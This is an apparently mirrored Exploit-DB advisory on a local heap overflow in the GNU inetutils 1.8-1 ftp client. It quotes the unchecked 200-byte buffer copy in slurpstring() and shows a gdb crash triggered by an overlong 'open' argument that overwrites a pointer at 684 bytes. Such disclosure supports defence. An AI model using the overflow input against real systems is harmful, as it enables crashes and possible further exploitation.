GNU InetUtils 1.8-1 – FTP Client Heap Overflow

• Exploit Database
• 15 阅读

• 作者： Rew
  日期： 2010-12-07
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/15705/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  
  Title: GNU inetutils 1.8-1 ftp client Heap Overflow
  Date: Dec 07 2010
  Author: Rew
  Software Link: http://ftp.gnu.org/gnu/inetutils/inetutils-1.8.tar.gz
  Version: 1.8-1
  Tested on: Arch Linux (up to date)
  CVE: NA (0day)
  
  ===========================================================================
  
  Here's a cute little bug just for kicks.This is only triggerable by
  the local user, so exploitation would get you absolutely nowhere, but
  meh :P
  
  GNU inetutils ftp (shipped with linux and other *nix's) suffers a heap
  overflow while parsing command arguments (but ONLY when the argument is
  NOT passed on the same line.) If you run any command (open, user, cd,
  mkdir, etc) without an argument, ftp will prompt you for an argument
  with readline().It will then copy this input into a 200 byte buffer
  without first checking it's length.NOTE: Some distros might modify
  this binary.It didn't seem to work on the default Mint ftp client
  (maybe a Ubuntu thing?) but the default Arch binary is vulnerable.Your
  results may vary.Download from GNU if you have doubts.
  
  - --- ftp/main.c:slurpstring() ---
  
  406: char *sb = stringbase; <--- This is our input. (can be massive)
  407: char *ap = argbase;<--- This buffer is 200 bytes.
  
  458: S1:
  
  463: case '\0':
  464:goto OUT;
  
  474: default:
  475:*ap++ = *sb++;		<--- Heap overflow
  476:got_one = 1;
  477:goto S1;
  478: }
  
  - --------------------------------
  
  backtrace at overflow:
  main()->cmdscanner()->cd()->another()->makeargv()->slurpstring()
  
  The segfault below occurs later, when free() is called on an overwritten
  pointer @ 684 bytes.
  
  ===========================================================================
  
  rew@WOPR ~ $ pacman -Q inetutils
  inetutils 1.8-1
  
  rew@WOPR ~ $ gdb ftp
  GNU gdb (GDB) 7.2
  Copyright (C) 2010 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later
  <http://gnu.org/licenses/gpl.html>
  This is free software: you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.Type "show copying"
  and "show warranty" for details.
  This GDB was configured as "i686-pc-linux-gnu".
  Reading symbols from /usr/bin/ftp...(no debugging symbols found)...done.
  
  (gdb) run
  Starting program: /usr/bin/ftp
  ftp> open
  (to) AAAAAAAA ... [x684] ... AAAAAAAABBBB
  usage: open host-name [port]
  
  Program received signal SIGSEGV, Segmentation fault.
  0xb7eb8dc1 in free () from /lib/libc.so.6
  (gdb) i r
  eax0x0	0
  ecx0x1	1
  edx0x42424239	1111638329
  ebx0xb7f8fff4	-1208418316
  esp0xbffff818	0xbffff818
  ebp0xbffff828	0xbffff828
  esi0x8064518	134628632
  edi0x8064be0	134630368
  eip0xb7eb8dc1	0xb7eb8dc1 <free+49>
  eflags 0x210216	[ PF AF IF RF ID ]
  cs 0x73	115
  ss 0x7b	123
  ds 0x7b	123
  es 0x7b	123
  fs 0x0	0
  gs 0x33	51
  
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v1.4.11 (GNU/Linux)
  Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  
  iEYEARECAAYFAkz+xCwACgkQy2WYMxSouUxJgACePkKDrYlTuj0UaU6s0NmjVWKZ
  uBQAoJXka83R8QvgzmEj0yF0B9Eni40Y
  =SUzV
  -----END PGP SIGNATURE-----